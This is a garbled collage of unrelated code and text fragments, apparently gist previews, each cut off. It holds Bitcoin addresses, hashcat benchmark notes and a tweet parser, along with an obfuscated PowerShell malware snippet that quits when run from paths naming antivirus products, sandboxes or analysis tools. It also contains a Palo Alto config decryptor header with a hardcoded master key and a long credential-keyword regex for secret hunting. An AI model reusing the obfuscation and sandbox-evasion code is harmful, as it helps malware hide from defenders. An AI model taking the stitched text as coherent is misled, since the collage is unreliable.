ℹ️ This was duplicated to this blog for readability and reference
The most difficult challenge with RMM detection is contextual awareness around usage to determine if it is valid or malicious.
15m7FP7U4kDJhAVtjjUdUB8WYswpf7Dtho
1Nm2TMEFEdyb2BP6tLyuREoKECztibuK6P
1LJYrTxrQA5pFRRg2bSyJLT6MGezmMBVfX
1EiCssanXmavzjtffYHzK6aVeQHngUxX1s
1H65AnxCg7mT4rTZmRzH8cxENk1N12rhkZ
1CVbdRQQ3TeWaPWqARKP9wvAEPvavJDrKo
1B9APV4ARm26MUW74ZcGNQE9hBHM5XGPbg
14u8xH6KdJFoTP93Lep9tpb1KQQvshQaAj
145V8AXLZpFv1ABVEsMYFsGpaZPwgKNZbf
1LGBP4iwrwv3GxybQ5QZJ19M3MAP76cw6U
$tweetJson = (Get-Content .\tweets.js -Raw).Substring("window.YTD.tweets.part0 =".Length)
$tweets = $tweetJson | ConvertFrom-Json
$currentThread = ""
foreach($currentTweetJson in $tweets)
{
    $currentTweet = $currentTweetJson.tweet
    if($currentTweet.in_reply_to_screen_name -eq "Lee_Holmes")
    {
NVIDIA Driver Version: 522.25 CUDA Version: 11.8
Credit: blazer
For benchmarking the card and allowing me to release the benchmarks here
The hashcat installation used includes a change to the tuning ALIAS.hctune file to include the RTX 4090 as "ALIAS_nv_sm50_or_higher".
The "Kernel exec timeout" warning is cosmetic and does not affect the speed of any of the benchmarked modes.
Benchmark was run at stock clocks on an Asus Strix 4090.
$Hl68 =[tyPe]("{2}{9}{5}{1}{7}{4}{6}{0}{8}{3}{10}"-f 'MPR','O.','sY','oN','ssIon.C','tEM.i','o','cOmpRe','ESSi','s','mODe') ; $tEuwx =[Type]("{3}{2}{0}{1}" -F 's','TEm.cONverT','Y','s'); Set ("{1}{0}"-f'e','PdWj') ([TYpe]("{2}{3}{0}{1}{4}"-F 'm','.Io','Sy','sTE','.fILe') ) ; ${s`crip`Tpath} = &("{2}{0}{1}"-f'pli','t-path','s') -parent ${m`Yi`NvoCa`TIoN}."MYC`omM`AND"."d`EFinitI`oN"
if (${sCR`i`P`TPath} -match ("{0}{1}" -f 'av','ast')) {exit}
if (${SCR`IP`TP`ATh} -match "avg") {exit}
if (${s`CrIpTp`A`Th} -match ("{1}{0}"-f 'le','samp')) {exit}
if (${SCr`IPTp`ATH} -match ("{0}{2}{1}" -f'anal','s','ysi')) {exit}
if (${sc`RIpT`paTh} -match ("{1}{2}{0}" -f're','malw','a')) {exit}
if (${SC`RI`PTP`Ath} -match ("{1}{2}{0}" -f'x','sand','bo')) {exit}
if (${Sc`Rip`TP`ATh} -match ("{0}{1}" -f 'v','irus')) {exit}
from hashlib import md5, sha1
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from base64 import b64encode, b64decode
import sys, time
import requests
DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8'
class PanCrypt():
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k
#!/bin/zsh
: '
You need a personal access token for GitHub to avoid hitting the rate limit. Refer to the docs:
https://docs.github.com/en/rest/guides/getting-started-with-the-rest-api
https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/creating-a-personal-access-token
'
APPLE_OSS_DIR="all_apple_oss_archives"
APPLE_OSS_REPO_FILE="all_apple_oss_repo_names.txt"
This list is no longer updated, thus the information is no longer reliable.
You can see the latest version (from October 2022) here
#Usage:
#
#NOTE: The script expects an argument which is the full file path of the EVTX file.
#
#C:\>ExtractAllScripts.ps1
#The default behavior of the script is to assimilate and extract every script/command to disk.
#
#C:\>ExtractAllScripts.ps1 -List
#This will only list Script Block IDs with associated script names (if logged).
#